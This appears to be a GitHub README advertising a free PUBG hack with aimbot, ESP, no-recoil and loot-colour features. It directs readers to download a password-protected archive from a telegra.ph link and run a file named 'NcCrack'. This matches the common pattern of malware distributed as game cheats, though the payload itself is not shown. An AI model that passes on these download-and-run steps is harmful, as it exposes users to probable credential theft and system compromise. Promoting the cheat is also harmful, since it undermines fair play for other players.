# PUBG-HACK-AIM-ESP-LOOT-COLORS-More

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Why us?

- We have a website with full player support

- We are constantly updating cheats for the latest version of the game

- We provide all CHEATS for FREE

- Not any problems with the installation 

- All cheats are connected into one launcher for convenience

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# Functions

# Players

- Only visible
- Friends
- Name
- Team
- Line
- Health
- Box 2D
- Skeleton
- Distance
- Spectator count
- Size line skeleton:
- Skeleton draw distance:
- Backlight distance:

# Loot

- Airdrops
- Corpses
- Vehicles
- Weapons:
- Main
- Handgun
- Melee
- Throwable
- Ammunition
- Attachments
- Equipments
- Headgear
- Vest
- Backpack
- Use:
- Heal
- Boost
- Fuel
- Gadget
- Backlight loot distance

# Aim

- Enable aimbot
- No sway
- No recoil
- Do not aim at friends
- Do not aim at knocked players
- Visibility check
- Aim priority:
- Distance
- Crosshair
- Control radius:
- Draw fov circle
- Fov:
- Distance:
- Enable prediction
- Draw aim prediction (Big frame delay
- Bones selection:
- Head
- Neck
- Left elbow
- Right elbow
- Body
- Pelvis
- Left knee
- Right knee
- Bone change time:
- Key selection

# Colors

- Visible players color
- Invisible players color
- My team players color
- Target player color
- Knoked players color
- AI players color
- Airdrops color
- Corpses color
- Vehicles color
- Weapons color
- Ammunition colorAttachments color
- Equipments color
- Use color
- Setting
- Key to disable loot:
- Open menu key:

# Screenshots from the game

![snw1](https://user-images.githubusercontent.com/119938147/213411279-12398695-0ecd-4489-b940-140d4cff71d4.jpg)
![snw2](https://user-images.githubusercontent.com/119938147/213411286-28730834-b20b-41c5-85d2-d479b9237f29.jpg)
![snw3](https://user-images.githubusercontent.com/119938147/213411289-c2f19240-a52a-4d42-ac0b-121299646acc.jpg)
![snw4](https://user-images.githubusercontent.com/119938147/213411296-fb13a2a2-0df5-4a1b-a26d-9cf1c083569e.jpg)
![snw5](https://user-images.githubusercontent.com/119938147/213411302-7add635a-dd55-46ce-8d17-3af25f7b37b2.jpg)
